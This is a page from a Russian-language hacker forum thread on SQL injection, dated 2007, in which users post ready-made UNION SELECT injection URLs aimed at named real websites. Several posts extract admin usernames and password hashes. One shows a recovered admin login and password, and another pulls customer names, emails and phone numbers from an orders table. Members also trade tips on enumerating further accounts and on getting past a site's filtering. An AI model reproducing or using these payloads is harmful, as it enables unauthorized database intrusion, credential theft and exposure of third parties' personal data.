ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 174 из 1242 « Первая < 74124164 170 171 172 173 174 175 176 177 178 1842242746741174 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1731  
Старый 08.04.2007, 00:58
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
=\\ http://www.kuraraydental.com/
Inj:
Цитата:
http://www.kuraraydental.com/viewproduct.php?pid=-19+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12+from+user
Админку не искал. Погонять по лимиту, можно выцепить других юзеров.

admin:chris-ko
__________________
..
Последний раз редактировалось [sL1p]; 08.04.2007 в 10:21.. Причина: мда
 
Ответить с цитированием

  #1732  
Старый 08.04.2007, 01:28
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
[sL1p], _ttp://radata.com я выложил на предыдущей странице :Р
 
Ответить с цитированием

  #1733  
Старый 08.04.2007, 11:13
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию
Цитата:
http://www.barsavto.ru/?_pageid=8&cat_id=-1+union+select+USER()/*&id=158
http://www.svrauto.ru/?pageId='+union+select+1,2,3,convert(USER()+using+ cp1251),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9/*
чет накаких интересны таблиц ненашёл
 
Ответить с цитированием

  #1734  
Старый 08.04.2007, 12:10
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию
Код:
http://www.realhit.ru/?page=news&id=-1+union+select+null,version(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,database(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,user(),null/*
 
Ответить с цитированием

  #1735  
Старый 08.04.2007, 12:47
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию
Цитата:
Сообщение от XTErner  
Код:
http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
чето нигде не выводит
У меня всё прекрасно выводит:
Код:
_http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7,8,9,10,11,12/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 08.04.2007 в 13:45..
 
Ответить с цитированием

  #1736  
Старый 08.04.2007, 14:21
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию
mafiaclub.ru
Код:
http://www.mafiaclub.ru/gallery/user.php?gid=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb_users+limit+1,1/*
phpbb хеш админа
там 5 админов, перебор лимитами.
Последний раз редактировалось n1†R0x; 08.04.2007 в 14:23..
 
Ответить с цитированием

  #1737  
Старый 08.04.2007, 14:37
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Код:
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,4,5,6,7+from+orders/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(name,char(58),email,char(58),phone),5,6,7+from+orders/*
 
Ответить с цитированием

  #1738  
Старый 08.04.2007, 14:49
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию
Цитата:
Сообщение от ShadOS  
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
Такая же трабла.
 
Ответить с цитированием

  #1739  
Старый 08.04.2007, 14:50
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию
Код:
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
 
Ответить с цитированием

  #1740  
Старый 08.04.2007, 14:55
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
Территория

===============
www.it-territory.ru
===============
Код:
http://www.it-territory.ru./index.php?obj=press&id=136+union+select+1,version(),3,4/*
Список статей, самый низ
Кто достанет нам новый апдейт Территории?
 
Ответить с цитированием
Ответ
Страница 174 из 1242 « Первая < 74124164 170 171 172 173 174 175 176 177 178 1842242746741174 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ